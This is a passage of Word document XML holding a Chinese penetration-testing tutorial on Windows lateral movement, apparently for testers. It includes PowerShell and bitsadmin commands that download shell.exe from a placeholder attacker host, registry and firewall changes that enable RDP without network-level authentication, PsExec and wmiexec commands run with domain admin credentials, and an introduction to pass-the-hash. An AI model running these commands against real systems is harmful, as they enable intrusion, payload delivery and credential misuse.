      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>temp\shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5483225" cy="568960"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1016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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5483225" cy="568960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> ②Powershell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>powershell -c iex(new-object system.net.webclient).downloadfile('http://IP:Port/shell.exe','C:\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>temp\</w:t>
      </w:r>
      <w:bookmarkStart w:id="14" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>shell.exe')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>powershell wget -uri http://IP:Port/shell.exe -outfile C:\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>temp\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>shell.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5484495" cy="690880"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1016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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5484495" cy="690880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> ③BITSAdmin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>bitsadmin /transfer test http://IP:Port/shell.exe  C:\shell.exe</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:bookmarkEnd w:id="4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="四远程桌面利用"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>二</w:t>
      </w:r>
      <w:r>
        <w:t>、远程桌面利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="X275faa39547b07d680cbcd8cb2c10f51fd3ce2e"/>
      <w:r>
        <w:t>1、确定远程桌面是否开启</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 若字段为0(0x0)，则说明RDP服务已启动；若为1(0x1)，则RDP服务已禁用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Telnet 192.168.118.118 3389</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="Xe01ce05f893700bf557178661b74969f00895d3"/>
      <w:r>
        <w:t>2、开启与关闭远程桌面服务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 开启远程桌面服务，注意需要system权限</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 关闭"仅允许运行使用网络级别身份验证的远程桌面的计算机连接"(鉴权)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 设置防火墙策略放行3389端口</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="5"/>
    <w:bookmarkEnd w:id="7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="五psexec远程控制"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>三</w:t>
      </w:r>
      <w:r>
        <w:t>、PsExec远程控制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://learn.microsoft.com/en-us/sysinternals/downloads/psexec" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
        </w:rPr>
        <w:t>PsExec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>是微软官方提供的一款Windows远程控制工具，可以根据凭据在远程系统上执行管理操作，并且可以获得与命令行几乎相同的时效交互性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> PsExec的原理是通过SMB连接到服务器端的的Admin$共享，并释放名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>psexesvc.exe</w:t>
      </w:r>
      <w:r>
        <w:t>的二进制文件，然后注册</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>PSECESVC</w:t>
      </w:r>
      <w:r>
        <w:t>服务。当客户端执行命令时，服务端通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>PSECESVC</w:t>
      </w:r>
      <w:r>
        <w:t>启动相应的程序执行命令并回显数据。运行结束后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>PSECESVC</w:t>
      </w:r>
      <w:r>
        <w:t>服务会被删除。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>用PsExec进行远程操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>条件:① 远程主机开启了Admin$共享。② 远程主机未开启防火墙或放行445端口。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>③</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>登陆域控时需要拥有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>域管理员组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>内账号密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">net group </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>domain admins</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> /domain   #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>查看域管理员</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5481320" cy="1751965"/>
            <wp:effectExtent l="0" t="0" r="508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481320" cy="1751965"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">psexec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>kele</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>/administrator:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>X123456@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>@192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>118.118</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5481955" cy="3431540"/>
            <wp:effectExtent l="0" t="0" r="444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5481955" cy="3431540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="六wmi的利用"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>四</w:t>
      </w:r>
      <w:r>
        <w:t>、WMI的利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t>WMI(Windows Management Instrumentation，Windows管理规范)是一项核心的Windows管理技术，用户可以通过WMI管理本地和远程计算机。在横向移动时，测试人员可以利用WMI提供的管理功能，通过已获取的用户凭据与本地或远程主机进行交互，并控制其执行各种行为。目前有两个常见的利用方法：① 通过调用WMI的类方法进行远程执行，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>Win32_Process</w:t>
      </w:r>
      <w:r>
        <w:t>类中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>Create</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以在远程主机上创建进程，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>Win32_Product</w:t>
      </w:r>
      <w:r>
        <w:t>类中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>Install</w:t>
      </w:r>
      <w:r>
        <w:t>方法在远程主机上安装恶意的MSI；② 远程部署WMI事件订阅，在特定的条件发生时触发工具。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>利用WMI横向移动需要具备以下条件：① 远程主机的WMI服务是开启状态(默认开启)；② 远程主机防火墙放行139端口。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>③</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>登陆域控时需要拥有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>域管理员组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>内账号密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="Xc6e75a47e5cf02d037be3c4b65fe1cef744269e"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>、常见利用工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> ① wmiexec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">wmiexec.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>kele</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/administrator:”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>X123456</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>@”@192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>118</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8 “whoami”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5483225" cy="3253105"/>
            <wp:effectExtent l="0" t="0" r="317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5483225" cy="3253105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">wmiexec.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>kele</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/administrator:”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>X123456</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>@”@192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>118</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">8 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5483860" cy="305879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5483860" cy="3058795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:bookmarkEnd w:id="10"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="五哈希传递攻击"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>五</w:t>
      </w:r>
      <w:r>
        <w:t>、哈希传递攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t>哈希传递攻击(Pass The Hash，PTH)是一种针对NTLM协议的攻击技术。在NTLM身份认证的第三步生成Response中，客户端直接使用用户的NTLM哈希值进行计算，用户的明文密码不参与整个认证过程。也就是说，在Windows系统中只使用用户哈希值对访问资源的用户进行身份认证。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>因此，当测试人员获得有效的用户名和密码哈希值后，就能够使用该信息对远程主机进行身份认证，不需要暴力破解明文密码即可获得主机权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
